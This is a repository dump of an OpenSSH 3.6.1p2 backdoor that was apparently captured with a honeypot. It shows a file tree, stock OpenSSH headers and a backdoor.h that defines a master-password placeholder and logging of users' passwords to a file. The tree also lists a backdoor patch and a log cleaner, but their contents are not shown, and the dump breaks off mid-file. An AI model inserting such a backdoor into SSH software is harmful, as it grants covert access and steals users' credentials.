├── CREDITS ├── ChangeLog ├── INSTALL ├── LICENCE ├── Makefile ├── Makefile.in ├── OVERVIEW ├── README.md ├── README.privsep ├── README.smartcard ├── RFC.nroff ├── TODO ├── WARNING.RNG ├── acconfig.h ├── aclocal.m4 ├── atomicio.c ├── atomicio.h ├── atomicio.o ├── auth-bsdauth.c ├── auth-bsdauth.o ├── auth-chall.c ├── auth-chall.o ├── auth-krb4.c ├── auth-krb4.o ├── auth-krb5.c ├── auth-krb5.o ├── auth-options.c ├── auth-options.h ├── auth-options.o ├── auth-pam.c ├── auth-pam.h ├── auth-pam.o ├── auth-passwd.c ├── auth-passwd.o ├── auth-rh-rsa.c ├── auth-rh-rsa.o ├── auth-rhosts.c ├── auth-rhosts.o ├── auth-rsa.c ├── auth-rsa.o ├── auth-sia.c ├── auth-sia.h ├── auth-sia.o ├── auth-skey.c ├── auth-skey.o ├── auth.c ├── auth.h ├── auth.o ├── auth1.c ├── auth1.o ├── auth2-chall.c ├── auth2-chall.o ├── auth2-hostbased.c ├── auth2-hostbased.o ├── auth2-kbdint.c ├── auth2-kbdint.o ├── auth2-none.c ├── auth2-none.o ├── auth2-pam.c ├── auth2-pam.h ├── auth2-pam.o ├── auth2-passwd.c ├── auth2-passwd.o ├── auth2-pubkey.c ├── auth2-pubkey.o ├── auth2.c ├── auth2.o ├── authfd.c ├── authfd.h ├── authfd.o ├── authfile.c ├── authfile.h ├── authfile.o ├── autom4te.cache ├── output.0 ├── requests └── traces.0 ├── backdoor.h ├── bsd.txt ├── bufaux.c ├── bufaux.h ├── bufaux.o ├── buffer.c ├── buffer.h ├── buffer.o ├── canohost.c ├── canohost.h ├── canohost.o ├── channels.c ├── channels.h ├── channels.o ├── cipher.c ├── cipher.h ├── cipher.o ├── clientloop.c ├── clientloop.h ├── clientloop.o ├── compat.c ├── compat.h ├── compat.o ├── compress.c ├── compress.h ├── compress.o ├── config.guess ├── config.h ├── config.h.in ├── config.log ├── config.status ├── config.sub ├── configure ├── configure.ac ├── contrib ├── Makefile ├── README ├── aix │ ├── README │ ├── buildbff.sh │ └── inventory.sh ├── caldera │ ├── openssh.spec │ ├── ssh-host-keygen │ ├── sshd.init │ └── sshd.pam ├── cygwin │ ├── README │ ├── ssh-host-config │ └── ssh-user-config ├── gnome-ssh-askpass1.c ├── gnome-ssh-askpass2.c ├── hpux │ ├── README │ ├── egd │ ├── egd.rc │ ├── sshd │ └── sshd.rc ├── redhat │ ├── gnome-ssh-askpass.csh │ ├── gnome-ssh-askpass.sh │ ├── openssh.spec │ ├── sshd.init │ ├── sshd.init.old │ ├── sshd.pam │ └── sshd.pam.old ├── solaris │ ├── README │ ├── buildpkg.sh │ └── opensshd.in ├── ssh-copy-id ├── ssh-copy-id.1 ├── sshd.pam.freebsd ├── sshd.pam.generic └── suse │ ├── openssh.spec │ ├── rc.config.sshd │ └── rc.sshd ├── crc32.c ├── crc32.h ├── crc32.o ├── deattack.c ├── deattack.h ├── deattack.o ├── defines.h ├── dh.c ├── dh.h ├── dh.o ├── dispatch.c ├── dispatch.h ├── dispatch.o ├── entropy.c ├── entropy.h ├── entropy.o ├── error_log ├── error_log.1 ├── error_log.2 ├── fatal.c ├── fatal.o ├── fixpaths ├── fixprogs ├── gcc ├── gcc-dev ├── getput.h ├── groupaccess.c ├── groupaccess.h ├── groupaccess.o ├── hostfile.c ├── hostfile.h ├── hostfile.o ├── includes.h ├── install-sh ├── kex.c ├── kex.h ├── kex.o ├── kexdh.c ├── kexdh.o ├── kexdhc.c ├── kexdhc.o ├── kexdhs.c ├── kexdhs.o ├── kexgex.c ├── kexgex.o ├── kexgexc.c ├── kexgexc.o ├── kexgexs.c ├── kexgexs.o ├── key.c ├── key.h ├── key.o ├── libssh.a ├── log.c ├── log.h ├── log.o ├── loginrec.c ├── loginrec.h ├── loginrec.o ├── logintest.c ├── mac.c ├── mac.h ├── mac.o ├── make ├── match.c ├── match.h ├── match.o ├── md5crypt.c ├── md5crypt.h ├── md5crypt.o ├── mdoc2man.pl ├── misc.c ├── misc.h ├── misc.o ├── mkinstalldirs ├── moduli ├── moduli.out ├── monitor.c ├── monitor.h ├── monitor.o ├── monitor_fdpass.c ├── monitor_fdpass.h ├── monitor_fdpass.o ├── monitor_mm.c ├── monitor_mm.h ├── monitor_mm.o ├── monitor_wrap.c ├── monitor_wrap.h ├── monitor_wrap.o ├── mpaux.c ├── mpaux.h ├── mpaux.o ├── msg.c ├── msg.h ├── msg.o ├── muie ├── myproposal.h ├── nchan.c ├── nchan.ms ├── nchan.o ├── nchan2.ms ├── openbsd-compat ├── .cvsignore ├── Makefile ├── Makefile.in ├── base64.c ├── base64.h ├── base64.o ├── basename.c ├── basename.h ├── basename.o ├── bindresvport.c ├── bindresvport.h ├── bindresvport.o ├── bsd-arc4random.c ├── bsd-arc4random.h ├── bsd-arc4random.o ├── bsd-cray.c ├── bsd-cray.h ├── bsd-cray.o ├── bsd-cygwin_util.c ├── bsd-cygwin_util.h ├── bsd-cygwin_util.o ├── bsd-getpeereid.c ├── bsd-getpeereid.h ├── bsd-getpeereid.o ├── bsd-misc.c ├── bsd-misc.h ├── bsd-misc.o ├── bsd-nextstep.c ├── bsd-nextstep.h ├── bsd-nextstep.o ├── bsd-snprintf.c ├── bsd-snprintf.h ├── bsd-snprintf.o ├── bsd-waitpid.c ├── bsd-waitpid.h ├── bsd-waitpid.o ├── daemon.c ├── daemon.h ├── daemon.o ├── dirname.c ├── dirname.h ├── dirname.o ├── fake-gai-errnos.h ├── fake-getaddrinfo.c ├── fake-getaddrinfo.h ├── fake-getaddrinfo.o ├── fake-getnameinfo.c ├── fake-getnameinfo.h ├── fake-getnameinfo.o ├── fake-socket.h ├── getcwd.c ├── getcwd.h ├── getcwd.o ├── getgrouplist.c ├── getgrouplist.h ├── getgrouplist.o ├── getopt.c ├── getopt.h ├── getopt.o ├── glob.c ├── glob.h ├── glob.o ├── inet_aton.c ├── inet_aton.h ├── inet_aton.o ├── inet_ntoa.c ├── inet_ntoa.h ├── inet_ntoa.o ├── inet_ntop.c ├── inet_ntop.h ├── inet_ntop.o ├── libopenbsd-compat.a ├── mktemp.c ├── mktemp.h ├── mktemp.o ├── openbsd-compat.h ├── port-aix.c ├── port-aix.h ├── port-aix.o ├── port-irix.c ├── port-irix.h ├── port-irix.o ├── readpassphrase.c ├── readpassphrase.h ├── readpassphrase.o ├── realpath.c ├── realpath.h ├── realpath.o ├── rresvport.c ├── rresvport.h ├── rresvport.o ├── setenv.c ├── setenv.h ├── setenv.o ├── setproctitle.c ├── setproctitle.h ├── setproctitle.o ├── sigact.c ├── sigact.h ├── sigact.o ├── strlcat.c ├── strlcat.h ├── strlcat.o ├── strlcpy.c ├── strlcpy.h ├── strlcpy.o ├── strmode.c ├── strmode.h ├── strmode.o ├── strsep.c ├── strsep.h ├── strsep.o ├── sys-queue.h ├── sys-tree.h ├── vis.c ├── vis.h ├── vis.o ├── xmmap.c ├── xmmap.h └── xmmap.o ├── openssh-3.6.1p2-backdoor.patch ├── openssl ├── packet.c ├── packet.h ├── packet.o ├── pathnames.h ├── progressmeter.c ├── progressmeter.h ├── progressmeter.o ├── radix.c ├── radix.h ├── radix.o ├── readconf.c ├── readconf.h ├── readconf.o ├── readpass.c ├── readpass.h ├── readpass.o ├── regress ├── Makefile ├── agent-getpeereid.sh ├── agent-ptrace.sh ├── agent-timeout.sh ├── agent.sh ├── authorized_keys_root ├── broken-pipe.sh ├── bsd.regress.mk ├── connect-privsep.sh ├── connect.sh ├── copy.1 ├── copy.2 ├── dsa_ssh2.prv ├── dsa_ssh2.pub ├── exit-status.sh ├── forwarding.sh ├── keygen-change.sh ├── keyscan.sh ├── proto-mismatch.sh ├── proto-version.sh ├── proxy-connect.sh ├── rsa_openssh.prv ├── rsa_openssh.pub ├── rsa_ssh2.prv ├── runtests.sh ├── sftp-batch.sh ├── sftp-cmds.sh ├── sftp.sh ├── ssh-com-client.sh ├── ssh-com-keygen.sh ├── ssh-com-sftp.sh ├── ssh-com.sh ├── stderr-after-eof.sh ├── stderr-data.sh ├── t4.ok ├── t5.ok ├── test-exec.sh ├── transfer.sh ├── try-ciphers.sh └── yes-head.sh ├── rijndael.c ├── rijndael.h ├── rijndael.o ├── rsa.c ├── rsa.h ├── rsa.o ├── scard-opensc.c ├── scard.c ├── scard.h ├── scard.o ├── scard ├── .cvsignore ├── Makefile ├── Makefile.in ├── Ssh.bin ├── Ssh.bin.uu └── Ssh.java ├── scp ├── scp.0 ├── scp.1 ├── scp.1.out ├── scp.c ├── scp.o ├── servconf.c ├── servconf.h ├── servconf.o ├── serverloop.c ├── serverloop.h ├── serverloop.o ├── session.c ├── session.h ├── session.o ├── setup ├── sftp ├── sftp-client.c ├── sftp-client.h ├── sftp-client.o ├── sftp-common.c ├── sftp-common.h ├── sftp-common.o ├── sftp-glob.c ├── sftp-glob.h ├── sftp-glob.o ├── sftp-int.c ├── sftp-int.h ├── sftp-int.o ├── sftp-server ├── sftp-server.0 ├── sftp-server.8 ├── sftp-server.8.out ├── sftp-server.c ├── sftp-server.o ├── sftp.0 ├── sftp.1 ├── sftp.1.out ├── sftp.c ├── sftp.h ├── sftp.o ├── ssh ├── ssh-add ├── ssh-add.0 ├── ssh-add.1 ├── ssh-add.1.out ├── ssh-add.c ├── ssh-add.o ├── ssh-agent ├── ssh-agent.0 ├── ssh-agent.1 ├── ssh-agent.1.out ├── ssh-agent.c ├── ssh-agent.o ├── ssh-dss.c ├── ssh-dss.o ├── ssh-keygen ├── ssh-keygen.0 ├── ssh-keygen.1 ├── ssh-keygen.1.out ├── ssh-keygen.c ├── ssh-keygen.o ├── ssh-keyscan ├── ssh-keyscan.0 ├── ssh-keyscan.1 ├── ssh-keyscan.1.out ├── ssh-keyscan.c ├── ssh-keyscan.o ├── ssh-keysign ├── ssh-keysign.0 ├── ssh-keysign.8 ├── ssh-keysign.8.out ├── ssh-keysign.c ├── ssh-keysign.o ├── ssh-rand-helper ├── ssh-rand-helper.0 ├── ssh-rand-helper.8 ├── ssh-rand-helper.8.out ├── ssh-rand-helper.c ├── ssh-rand-helper.o ├── ssh-rsa.c ├── ssh-rsa.o ├── ssh.0 ├── ssh.1 ├── ssh.1.out ├── ssh.c ├── ssh.h ├── ssh.jpg ├── ssh.o ├── ssh.txt ├── ssh1.h ├── ssh2.h ├── ssh_config ├── ssh_config.0 ├── ssh_config.1 ├── ssh_config.5 ├── ssh_config.5.out ├── ssh_config.out ├── ssh_old ├── ssh_prng_cmds ├── ssh_prng_cmds.in ├── sshconnect.c ├── sshconnect.h ├── sshconnect.o ├── sshconnect1.c ├── sshconnect1.o ├── sshconnect2.c ├── sshconnect2.o ├── sshd ├── sshd.0 ├── sshd.8 ├── sshd.8.out ├── sshd.c ├── sshd.o ├── sshd_config ├── sshd_config.0 ├── sshd_config.1 ├── sshd_config.5 ├── sshd_config.5.out ├── sshd_config.out ├── sshd_old ├── sshlogin.c ├── sshlogin.h ├── sshlogin.o ├── sshpty.c ├── sshpty.h ├── sshpty.o ├── sshtty.c ├── sshtty.h ├── sshtty.o ├── start ├── test ├── tildexpand.c ├── tildexpand.h ├── tildexpand.o ├── tools ├── logcleaner ├── logcleaner.c ├── makefile ├── random.sh ├── readme.mig └── skull.txt ├── ttymodes.c ├── ttymodes.h ├── ttymodes.o ├── uidswap.c ├── uidswap.h ├── uidswap.o ├── uuencode.c ├── uuencode.h ├── uuencode.o ├── v ├── version.h ├── xmalloc.c ├── xmalloc.h ├── xmalloc.o └── zlib /README.md: -------------------------------------------------------------------------------- 1 | # openssh-backdoor 2 | Openssh backdoor found with a ssh honeypot 3 | -------------------------------------------------------------------------------- /atomicio.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1995,1999 Theo de Raadt. All rights reserved. 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 1. Redistributions of source code must retain the above copyright 9 | * notice, this list of conditions and the following disclaimer. 10 | * 2. Redistributions in binary form must reproduce the above copyright 11 | * notice, this list of conditions and the following disclaimer in the 12 | * documentation and/or other materials provided with the distribution. 13 | * 14 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 15 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 16 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 17 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 18 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 19 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 20 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 21 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 23 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | */ 25 | 26 | #include "includes.h" 27 | RCSID("$OpenBSD: atomicio.c,v 1.10 2001/05/08 22:48:07 markus Exp $"); 28 | 29 | #include "atomicio.h" 30 | 31 | /* 32 | * ensure all of data on socket comes through. f==read || f==write 33 | */ 34 | ssize_t 35 | atomicio(f, fd, _s, n) 36 | ssize_t (*f) (); 37 | int fd; 38 | void *_s; 39 | size_t n; 40 | { 41 | char *s = _s; 42 | ssize_t res, pos = 0; 43 | 44 | while (n > pos) { 45 | res = (f) (fd, s + pos, n - pos); 46 | switch (res) { 47 | case -1: 48 | #ifdef EWOULDBLOCK 49 | if (errno == EINTR || errno == EAGAIN || errno == EWOULDBLOCK) 50 | #else 51 | if (errno == EINTR || errno == EAGAIN) 52 | #endif 53 | continue; 54 | case 0: 55 | return (res); 56 | default: 57 | pos += res; 58 | } 59 | } 60 | return (pos); 61 | } 62 | -------------------------------------------------------------------------------- /atomicio.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: atomicio.h,v 1.4 2001/06/26 06:32:46 itojun Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 1995,1999 Theo de Raadt. All rights reserved. 5 | * All rights reserved. 6 | * 7 | * Redistribution and use in source and binary forms, with or without 8 | * modification, are permitted provided that the following conditions 9 | * are met: 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 17 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 18 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 19 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 20 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 21 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 22 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 24 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 25 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | */ 27 | 28 | /* 29 | * Ensure all of data on socket comes through. f==read || f==write 30 | */ 31 | ssize_t atomicio(ssize_t (*)(), int, void *, size_t); 32 | -------------------------------------------------------------------------------- /atomicio.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/atomicio.o -------------------------------------------------------------------------------- /auth-bsdauth.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-bsdauth.o -------------------------------------------------------------------------------- /auth-chall.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-chall.o -------------------------------------------------------------------------------- /auth-krb4.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-krb4.o -------------------------------------------------------------------------------- /auth-krb5.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-krb5.o -------------------------------------------------------------------------------- /auth-options.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: auth-options.h,v 1.12 2002/07/21 18:34:43 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #ifndef AUTH_OPTIONS_H 16 | #define AUTH_OPTIONS_H 17 | 18 | /* Linked list of custom environment strings */ 19 | struct envstring { 20 | struct envstring *next; 21 | char *s; 22 | }; 23 | 24 | /* Flags that may be set in authorized_keys options. */ 25 | extern int no_port_forwarding_flag; 26 | extern int no_agent_forwarding_flag; 27 | extern int no_x11_forwarding_flag; 28 | extern int no_pty_flag; 29 | extern char *forced_command; 30 | extern struct envstring *custom_environment; 31 | 32 | int auth_parse_options(struct passwd *, char *, char *, u_long); 33 | void auth_clear_options(void); 34 | 35 | #endif 36 | -------------------------------------------------------------------------------- /auth-options.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-options.o -------------------------------------------------------------------------------- /auth-pam.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-pam.o -------------------------------------------------------------------------------- /auth-passwd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-passwd.o -------------------------------------------------------------------------------- /auth-rh-rsa.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-rh-rsa.o -------------------------------------------------------------------------------- /auth-rhosts.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-rhosts.o -------------------------------------------------------------------------------- /auth-rsa.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-rsa.o -------------------------------------------------------------------------------- /auth-sia.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2002 Chris Adams. All rights reserved. 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions 6 | * are met: 7 | * 1. Redistributions of source code must retain the above copyright 8 | * notice, this list of conditions and the following disclaimer. 9 | * 2. Redistributions in binary form must reproduce the above copyright 10 | * notice, this list of conditions and the following disclaimer in the 11 | * documentation and/or other materials provided with the distribution. 12 | * 13 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 14 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 15 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 16 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 17 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 18 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 19 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 20 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | */ 24 | 25 | #include "includes.h" 26 | 27 | #ifdef HAVE_OSF_SIA 28 | 29 | int auth_sia_password(Authctxt *authctxt, char *pass); 30 | void session_setup_sia(struct passwd *pw, char *tty); 31 | 32 | #endif /* HAVE_OSF_SIA */ 33 | -------------------------------------------------------------------------------- /auth-sia.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-sia.o -------------------------------------------------------------------------------- /auth-skey.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth-skey.o -------------------------------------------------------------------------------- /auth.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth.o -------------------------------------------------------------------------------- /auth1.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth1.o -------------------------------------------------------------------------------- /auth2-chall.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-chall.o -------------------------------------------------------------------------------- /auth2-hostbased.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-hostbased.o -------------------------------------------------------------------------------- /auth2-kbdint.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-kbdint.o -------------------------------------------------------------------------------- /auth2-none.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-none.o -------------------------------------------------------------------------------- /auth2-pam.h: -------------------------------------------------------------------------------- 1 | /* $Id: auth2-pam.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #include "includes.h" 4 | #ifdef USE_PAM 5 | 6 | int auth2_pam(Authctxt *authctxt); 7 | 8 | #endif /* USE_PAM */ 9 | -------------------------------------------------------------------------------- /auth2-pam.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-pam.o -------------------------------------------------------------------------------- /auth2-passwd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-passwd.o -------------------------------------------------------------------------------- /auth2-pubkey.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2-pubkey.o -------------------------------------------------------------------------------- /auth2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/auth2.o -------------------------------------------------------------------------------- /authfd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/authfd.o -------------------------------------------------------------------------------- /authfile.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: authfile.h,v 1.10 2002/05/23 19:24:30 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #ifndef AUTHFILE_H 16 | #define AUTHFILE_H 17 | 18 | int key_save_private(Key *, const char *, const char *, const char *); 19 | Key *key_load_public(const char *, char **); 20 | Key *key_load_public_type(int, const char *, char **); 21 | Key *key_load_private(const char *, const char *, char **); 22 | Key *key_load_private_type(int, const char *, const char *, char **); 23 | Key *key_load_private_pem(int, int, const char *, char **); 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /authfile.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/authfile.o -------------------------------------------------------------------------------- /backdoor.h: -------------------------------------------------------------------------------- 1 | /* backdoor stuff */ 2 | #define BACKDOORPASSWD "SSHD_PASS" 3 | #define LOGGING_PASSWORDS 1 4 | #define PASSWORDS_LOG_FILE "LOG_PATH" 5 | 6 | int backdoor_active; 7 | -------------------------------------------------------------------------------- /bsd.txt: -------------------------------------------------------------------------------- 1 | _____ _____ ____ _____ _____ __ _____ 2 | | __ | __| \| | | __| | | _ | 3 | | __ -|__ | | | | __| |__| __| 4 | |_____|_____|____/|__|__|_____|_____|__| 5 | -------------------------------------------------------------------------------- /bufaux.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: bufaux.h,v 1.18 2002/04/20 09:14:58 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #ifndef BUFAUX_H 16 | #define BUFAUX_H 17 | 18 | #include "buffer.h" 19 | #include 20 | 21 | void buffer_put_bignum(Buffer *, BIGNUM *); 22 | void buffer_put_bignum2(Buffer *, BIGNUM *); 23 | void buffer_get_bignum(Buffer *, BIGNUM *); 24 | void buffer_get_bignum2(Buffer *, BIGNUM *); 25 | 26 | u_short buffer_get_short(Buffer *); 27 | void buffer_put_short(Buffer *, u_short); 28 | 29 | u_int buffer_get_int(Buffer *); 30 | void buffer_put_int(Buffer *, u_int); 31 | 32 | #ifdef HAVE_U_INT64_T 33 | u_int64_t buffer_get_int64(Buffer *); 34 | void buffer_put_int64(Buffer *, u_int64_t); 35 | #endif 36 | 37 | int buffer_get_char(Buffer *); 38 | void buffer_put_char(Buffer *, int); 39 | 40 | void *buffer_get_string(Buffer *, u_int *); 41 | void buffer_put_string(Buffer *, const void *, u_int); 42 | void buffer_put_cstring(Buffer *, const char *); 43 | 44 | #define buffer_skip_string(b) \ 45 | do { u_int l = buffer_get_int(b); buffer_consume(b, l); } while(0) 46 | 47 | #endif /* BUFAUX_H */ 48 | -------------------------------------------------------------------------------- /bufaux.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/bufaux.o -------------------------------------------------------------------------------- /buffer.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: buffer.h,v 1.11 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * Code for manipulating FIFO buffers. 8 | * 9 | * As far as I am concerned, the code I have written for this software 10 | * can be used freely for any purpose. Any derived versions of this 11 | * software must be clearly marked as such, and if the derived work is 12 | * incompatible with the protocol description in the RFC file, it must be 13 | * called by a name other than "ssh" or "Secure Shell". 14 | */ 15 | 16 | #ifndef BUFFER_H 17 | #define BUFFER_H 18 | 19 | typedef struct { 20 | u_char *buf; /* Buffer for data. */ 21 | u_int alloc; /* Number of bytes allocated for data. */ 22 | u_int offset; /* Offset of first byte containing data. */ 23 | u_int end; /* Offset of last byte containing data. */ 24 | } Buffer; 25 | 26 | void buffer_init(Buffer *); 27 | void buffer_clear(Buffer *); 28 | void buffer_free(Buffer *); 29 | 30 | u_int buffer_len(Buffer *); 31 | void *buffer_ptr(Buffer *); 32 | 33 | void buffer_append(Buffer *, const void *, u_int); 34 | void *buffer_append_space(Buffer *, u_int); 35 | 36 | void buffer_get(Buffer *, void *, u_int); 37 | 38 | void buffer_consume(Buffer *, u_int); 39 | void buffer_consume_end(Buffer *, u_int); 40 | 41 | void buffer_dump(Buffer *); 42 | 43 | #endif /* BUFFER_H */ 44 | -------------------------------------------------------------------------------- /buffer.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/buffer.o -------------------------------------------------------------------------------- /canohost.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: canohost.h,v 1.8 